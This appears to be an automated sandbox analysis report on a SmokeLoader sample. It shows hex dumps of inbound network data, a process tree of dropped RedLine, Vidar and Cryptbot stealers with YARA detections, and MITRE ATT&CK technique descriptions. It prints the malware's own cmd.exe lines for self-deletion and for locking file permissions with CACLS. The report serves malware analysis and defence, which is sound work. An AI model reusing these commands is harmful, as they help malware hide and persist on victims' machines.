2021-12-01 08:15:23 UTC	4617	IN	Data Raw: c8 7d 24 ff c9 7d 24 ff c9 7d 24 ff c9 7d 25 ff ca 7e 25 ff ca 7e 25 ff ca 7e 25 ff ca 7e 25 ff ca 7e 25 ff ca 7e 25 ff c9 7d 25 ff c9 7d 24 ff c9 7d 24 ff c8 7d 24 ff c8 7d 24 ff c8 7c 24 ff c7 7c 23 ff c7 7c 23 ff c6 7b 23 ff c5 7b 22 ff c4 7a 22 ff c3 7a 22 ff c3 79 21 ff c2 79 21 ff c1 78 20 ff c0 78 20 ff bf 77 1f ff bf 76 1f ff be 76 1e ff bd 75 1e ff bc 74 1d ff bb 74 1d ff ba 73 1c ff b9 72 1b ff b8 72 1b ff b7 71 1a ff b6 70 1a ff b5 6f 19 ff b4 6f 18 ff b3 6e 18 ff b2 6d 17 ff b1 6c 16 ff af 6b 16 ff ae 6b 15 ff ad 6a 14 ff ac 69 14 ff ab 68 13 ff aa 67 13 ff a9 67 13 ff a7 66 12 ff a6 65 11 ff a5 64 11 ff a4 63 10 ff a3 62 0f ff a2 61 0f ff a0 61 0e ff ae 73 24 ff fd d7 a2 ff b5 7c 32 ff 9c 5d 0b ff 9a 5c 0a ff a3 67 18 24 00 00 00 00 00 00 00 Data Ascii: }$}$}$}%~%~%~%~%~%~%}%}$}$}$}$\|$\|#\|#{#{"z"z"y!y!x x wvvuttsrrqpoonmlkkjihggfedcbaas$\|2]\g$
2021-12-01 08:15:23 UTC	4633	IN	Data Raw: d7 a7 66 ff e2 b4 77 ff e7 ba 7e ff f3 c9 92 ff f3 c9 92 ff f3 c9 92 ff fd d7 a2 ff fc d5 a0 ff f3 c9 92 ff f3 c9 92 ff f1 c7 8f ff e7 ba 7e ff de b0 72 ff d5 a5 64 ff c9 95 51 ff bc 84 3b ff ac 71 23 ff 9c 5e 0b ff 9c 5d 0b ff 9c 5d 0b ff 9b 5d 0b ff 9b 5d 0b ff 9b 5d 0a ff 9a 5c 0a ff 9a 5c 0a eb 9a 5c 0a 9b a7 6c 1e 43 ac 72 25 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: fw~~rdQ;q#^]]]]]\\\lCr%
2021-12-01 08:15:23 UTC	4649	IN	Data Raw: a6 64 11 fe a7 65 12 ff a9 66 12 ff aa 68 13 fe ac 69 13 ff ad 6a 14 ff af 6b 15 fe b0 6c 16 ff b2 6d 17 ff b3 6e 18 fe b4 6f 18 ff b6 70 19 ff b7 71 1a fe b8 72 1b ff ba 73 1c ff bb 74 1c fe ff ff ff ff ff ff ff ff ff ff ff ff fe fe fe fe ff ff ff ff fe fe fe ff f1 e0 cc fe d0 96 50 ff c5 7b 23 ff c5 7b 22 fe c6 7b 23 ff c7 7c 23 ff c8 7c 23 fe c8 7c 24 ff c8 7d 24 ff c8 7c 24 fe c9 7d 24 ff c9 7d 24 ff c8 7d 24 fe c8 7d 24 ff c8 7d 24 ff c8 7c 23 fe c7 7c 23 ff c7 7b 23 ff c6 7b 23 fe c5 7b 22 ff c4 7a 22 fe c3 79 21 ff c2 79 21 ff c1 78 20 fe c0 77 1f ff bf 77 1f ff be 76 1e fe bd 75 1d ff bc 74 1d ff ba 73 1c fe b9 72 1b ff b8 71 1b ff b6 70 1a fe b5 6f 19 ff b4 6e 18 ff b2 6d 17 fe b1 6c 16 ff af 6b 16 ff ae 6a 15 fe ac 69 14 ff ab 68 13 ff a9 67 12 Data Ascii: defhijklmnopqrstP{#{"{#\|#\|#\|$}$\|$}$}$}$}$}$\|#\|#{#{#{"z"y!y!x wwvutsrqponmlkjihg
2021-12-01 08:15:23 UTC	4665	IN	Data Raw: a4 63 0f ff a2 62 0f ff a1 61 0e fe c6 91 4b ff f3 ca 92 ff a9 6d 1f fe 9b 5c 0a fb a4 68 19 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 68 19 4d 9a 5c 0a f9 a5 68 18 fe f5 cc 96 fe d0 9e 5a fe a0 60 0e fe a2 61 0e fe a3 63 0f fe a5 63 10 fe a6 65 11 fe a7 66 12 fe a9 66 12 fe aa 67 12 fe ab 68 13 fe ad 69 14 fe ae 6a 15 fe af 6b 15 fe b0 6c 16 fe b1 6d 17 fe b2 6e 17 fe b4 6e 18 fe b5 6f 19 fe b6 70 19 fe b7 70 1a fe b8 71 1a fe b8 72 1b fe b9 72 1b fe ba 73 1c fe bb 73 1c fe bb 74 1d fe bc 74 1d fe bc 75 1d fe bd 75 1e fe bd 75 1e fe be 76 1e fe be 76 1e fe be 76 1e Data Ascii: cbaKm\hLhM\hZ`acceffghijklmnnoppqrrssttuuuvvv
2021-12-01 08:15:23 UTC	4681	IN	Data Raw: a9 67 12 ff ab 68 13 ff ad 69 14 ff af 6b 15 ff b1 6c 16 ff b3 6e 17 ff b4 6f 19 ff b6 70 1a ff b8 72 1b ff ba 73 1c ff dd b9 8d ff ff ff ff ff ff ff ff ff ff ff ff ff fd fb f9 ff e2 bf 96 ff c6 81 2d ff c5 7b 22 ff c6 7b 23 ff c7 7c 23 ff c8 7c 23 ff c8 7c 24 ff c8 7c 24 ff c8 7d 24 ff c8 7c 24 ff c8 7c 24 ff c7 7c 23 ff c7 7c 23 ff c6 7b 23 ff c5 7a 22 ff c3 7a 21 ff c2 79 21 ff c1 78 20 ff c0 77 1f ff be 76 1e ff bd 75 1d ff bb 74 1d ff ba 73 1c ff b8 71 1b ff b6 70 19 ff b4 6f 18 ff b2 6d 17 ff b1 6c 16 ff af 6b 15 ff ad 69 14 ff ab 68 13 ff a8 66 12 ff a7 65 11 ff a4 63 10 ff a2 62 0f ff a0 60 0e ff 9e 5f 0c ff 9c 5d 0b ff 9a 5c 0a 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ghiklnoprs-{"{#\|#\|#\|$\|$}$\|$\|$\|#\|#{#z"z!y!x wvutsqpomlkihfecb`_]\
2021-12-01 08:15:23 UTC	4697	IN	Data Raw: 9e 5e 0c ff 9d 5e 0c ff 9d 5e 0b ff 9c 5d 0b ff 9c 5d 0b ff 9b 5e 0e fc 9d 6f 33 e5 a0 87 66 bc a3 9e 99 87 a4 a4 a4 7f a4 a4 a4 7f a4 a4 a4 7f a4 a4 a4 7d a4 a4 a4 73 a4 a4 a4 65 a4 a4 a4 60 a4 a4 a4 60 a4 a4 a4 5d a4 a4 a4 51 a4 a4 a4 46 a4 a4 a4 41 a4 a4 a4 37 a4 a4 a4 2d a4 a4 a4 24 a4 a4 a4 18 a4 a4 a4 0b a4 a4 a4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 a4 a4 01 a4 a4 a4 02 a4 a4 a4 04 a4 a4 a4 06 a4 a4 a4 07 a4 a4 a4 0a a4 a4 a4 0d a3 a3 a3 0e a3 a1 9e 0e a3 a0 9c 10 a3 9e 98 15 a3 9c 93 19 a1 90 7a 3f 9d 73 3b aa 9b 5d 0c f7 9c 5d 0b ff 9d 5e 0b ff 9e 5e 0c ff 9e 5f 0c ff 9f 5f 0d ff 9f 60 0d ff a0 60 0d ff a0 60 0d ff a0 61 0e ff a1 61 0e ff a1 61 0e ff a1 61 0e ff a0 61 0e Data Ascii: ^^^]]^o3f}se``]QFA7-$z?s;]]^^__```aaaaa
2021-12-01 08:15:23 UTC	4713	IN	Data Raw: 9f 60 0d ff 9f 5f 0d fe 9e 5f 0c fe 9e 5f 0c ff 9d 5e 0c fe 9c 5d 0b fe 9c 60 12 f8 9e 74 3d cb a1 8f 77 7d a3 a2 a1 47 a3 a3 a3 46 a4 a4 a4 3f a3 a3 a3 32 a3 a3 a3 2f a4 a4 a4 2e a3 a3 a3 25 a3 a3 a3 1d a4 a4 a4 18 a3 a3 a3 10 a3 a3 a3 0b a4 a4 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a3 a1 9e 01 a1 97 89 01 a0 8b 70 01 9e 7c 4e 28 9c 68 24 ac 9c 5d 0c fa 9d 5e 0c ff 9e 5f 0c fe 9f 60 0d fe a0 60 0e ff a1 61 0e fe a2 62 0e fe a2 62 0f ff a3 62 0f fe a3 62 0f fe a3 62 0f ff a2 62 0f fe a2 62 0f fe a1 61 0e ff a1 61 0e fe a0 60 0d fe 9f 5f 0c ff 9d 5e 0c fe 9c 5d 0b fd 9c 64 1b c2 9e 77 43 40 a0 88 69 02 a1 93 80 01 a2 9e 98 01 a3 a3 a3 01 00 00 00 Data Ascii: `___^]`t=w}GF?2/.%p\|N(h$]^_``abbbbbbbaa`_^]dwC@i
2021-12-01 08:15:23 UTC	4729	IN	Data Raw: 00 00 00 00 a7 6d 20 64 bf 88 40 f0 b9 7e 32 ff a7 66 13 ff a7 66 11 ff a7 65 11 ff a9 69 17 ff bd 84 3a ff be 87 3f d8 9c 62 16 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 77 49 0c 11 a7 6c 1f 6d be 88 40 b0 c0 8a 43 cc c0 8a 43 c8 bb 84 3c a2 a0 65 17 55 67 3f 0b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 c0 07 00 00 80 03 00 00 80 01 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 01 00 00 c0 03 00 00 e0 07 00 00 f0 0f 00 00 00 00 01 00 09 00 00 00 00 00 00 00 00 00 28 20 04 00 01 00 80 80 00 00 00 00 00 00 28 08 01 00 02 00 60 60 00 00 00 00 00 00 a8 94 00 00 03 00 48 48 00 00 00 00 00 00 88 54 00 00 04 00 40 40 00 00 00 00 00 00 28 Data Ascii: m d@~2ffei:?b7wIlm@CC<eUg?( (``HHT@@(

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: v72n86vFFq.exe PID: 7056 Parent PID: 6036

General

Start time:	09:13:10
Start date:	01/12/2021
Path:	C:\Users\user\Desktop\v72n86vFFq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\v72n86vFFq.exe"
Imagebase:	0x400000
File size:	336896 bytes
MD5 hash:	1A430B2CBF785427C87C48D29A1A8C0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: v72n86vFFq.exe PID: 1440 Parent PID: 7056

General

Start time:	09:13:15
Start date:	01/12/2021
Path:	C:\Users\user\Desktop\v72n86vFFq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\v72n86vFFq.exe"
Imagebase:	0x400000
File size:	336896 bytes
MD5 hash:	1A430B2CBF785427C87C48D29A1A8C0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.736880382.0000000000540000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.737014881.0000000001F51000.00000004.00020000.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: explorer.exe PID: 3424 Parent PID: 1440

General

Start time:	09:13:21
Start date:	01/12/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000000.724058055.0000000004F41000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: hiftsuu PID: 796 Parent PID: 968

General

Start time:	09:13:54
Start date:	01/12/2021
Path:	C:\Users\user\AppData\Roaming\hiftsuu
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\hiftsuu
Imagebase:	0x400000
File size:	336896 bytes
MD5 hash:	1A430B2CBF785427C87C48D29A1A8C0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: 12F1.exe PID: 6580 Parent PID: 3424

General

Start time:	09:13:57
Start date:	01/12/2021
Path:	C:\Users\user\AppData\Local\Temp\12F1.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\12F1.exe
Imagebase:	0xce0000
File size:	1285856 bytes
MD5 hash:	31F17AD58D02772DF14EFAC37D416CD7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.948865342.0000000000CE2000.00000040.00020000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 26%, Metadefender, Browse Detection: 57%, ReversingLabs
Reputation:	moderate

Analysis Process: 1EAA.exe PID: 5572 Parent PID: 3424

General

Start time:	09:14:00
Start date:	01/12/2021
Path:	C:\Users\user\AppData\Local\Temp\1EAA.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\1EAA.exe
Imagebase:	0xe80000
File size:	397824 bytes
MD5 hash:	5115E5DAB211559A85CD0154E8100F53
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 0000000A.00000002.845557160.000000000434F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.845557160.000000000434F000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 0000000A.00000002.847931111.0000000004503000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.847931111.0000000004503000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 37%, Metadefender, Browse Detection: 79%, ReversingLabs
Reputation:	moderate

Analysis Process: conhost.exe PID: 6920 Parent PID: 5572

General

Start time:	09:14:01
Start date:	01/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: hiftsuu PID: 6896 Parent PID: 796

General

Start time:	09:14:02
Start date:	01/12/2021
Path:	C:\Users\user\AppData\Roaming\hiftsuu
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\hiftsuu
Imagebase:	0x7ff79e7d0000
File size:	336896 bytes
MD5 hash:	1A430B2CBF785427C87C48D29A1A8C0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.814172336.0000000000580000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.815844712.0000000002091000.00000004.00020000.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: 361B.exe PID: 6612 Parent PID: 3424

General

Start time:	09:14:06
Start date:	01/12/2021
Path:	C:\Users\user\AppData\Local\Temp\361B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\361B.exe
Imagebase:	0x400000
File size:	163328 bytes
MD5 hash:	DF13FAC0D8B182E4D8B9A02BA87A9571
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 29%, Metadefender, Browse Detection: 51%, ReversingLabs
Reputation:	low

Analysis Process: 1EAA.exe PID: 6700 Parent PID: 5572

General

Start time:	09:14:08
Start date:	01/12/2021
Path:	C:\Users\user\AppData\Local\Temp\1EAA.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\1EAA.exe
Imagebase:	0x410000
File size:	397824 bytes
MD5 hash:	5115E5DAB211559A85CD0154E8100F53
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: 44A2.exe PID: 6852 Parent PID: 3424

General

Start time:	09:14:10
Start date:	01/12/2021
Path:	C:\Users\user\AppData\Local\Temp\44A2.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44A2.exe
Imagebase:	0x400000
File size:	351744 bytes
MD5 hash:	45D0A6BB2CA00643FB04BF15D4AAA2C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.854851899.0000000000555000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000011.00000002.854851899.0000000000555000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: WerFault.exe PID: 7140 Parent PID: 6612

General

Start time:	09:14:12
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6612 -s 520
Imagebase:	0xdb0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: 1EAA.exe PID: 2740 Parent PID: 5572

General

Start time:	09:14:13
Start date:	01/12/2021
Path:	C:\Users\user\AppData\Local\Temp\1EAA.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\1EAA.exe
Imagebase:	0x4c0000
File size:	397824 bytes
MD5 hash:	5115E5DAB211559A85CD0154E8100F53
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000014.00000000.830171711.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000014.00000000.820409193.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000014.00000000.829040256.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000014.00000002.938711812.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000014.00000000.832066411.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: 51B3.exe PID: 1368 Parent PID: 3424

General

Start time:	09:14:14
Start date:	01/12/2021
Path:	C:\Users\user\AppData\Local\Temp\51B3.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\51B3.exe
Imagebase:	0x400000
File size:	336896 bytes
MD5 hash:	D2331EDF10B3C0E6A5C8FEC0A1A6392E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: 305.exe PID: 1380 Parent PID: 3424

General

Start time:	09:14:21
Start date:	01/12/2021
Path:	C:\Users\user\AppData\Local\Temp\305.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\305.exe
Imagebase:	0x1290000
File size:	2740224 bytes
MD5 hash:	CA16CA4AA9CF9777274447C9F4BA222E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.947756314.00000000012C5000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 00000016.00000002.947756314.00000000012C5000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.835817824.00000000009D0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 00000016.00000003.835817824.00000000009D0000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 43%, Metadefender, Browse Detection: 86%, ReversingLabs
Reputation:	moderate

Analysis Process: 51B3.exe PID: 5820 Parent PID: 1368

General

Start time:	09:14:23
Start date:	01/12/2021
Path:	C:\Users\user\AppData\Local\Temp\51B3.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\51B3.exe
Imagebase:	0x400000
File size:	336896 bytes
MD5 hash:	D2331EDF10B3C0E6A5C8FEC0A1A6392E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000017.00000002.854879480.0000000002051000.00000004.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000017.00000002.853177748.0000000000540000.00000004.00000001.sdmp, Author: Joe Security

Analysis Process: 2340.exe PID: 6508 Parent PID: 3424

General

Start time:	09:14:29
Start date:	01/12/2021
Path:	C:\Users\user\AppData\Local\Temp\2340.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\2340.exe
Imagebase:	0x270000
File size:	1143000 bytes
MD5 hash:	97617914D6E8A6E3CBEE8A5E5FF39AA5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 27%, ReversingLabs

Analysis Process: cmd.exe PID: 2892 Parent PID: 6852

General

Start time:	09:14:34
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\44A2.exe" & exit
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 5624 Parent PID: 2892

General

Start time:	09:14:34
Start date:	01/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 5588 Parent PID: 2892

General

Start time:	09:14:35
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 5
Imagebase:	0xa60000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: 2340.exe PID: 2812 Parent PID: 6508

General

Start time:	09:14:48
Start date:	01/12/2021
Path:	C:\Users\user\AppData\Local\Temp\2340.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\2340.exe
Imagebase:	0xdb0000
File size:	1143000 bytes
MD5 hash:	97617914D6E8A6E3CBEE8A5E5FF39AA5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 4432 Parent PID: 2812

General

Start time:	09:15:12
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe" /c echo Y\|CACLS "C:\Users\user\AppData\Local\Temp\6829558ede\tkools.exe" /P "user:N
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

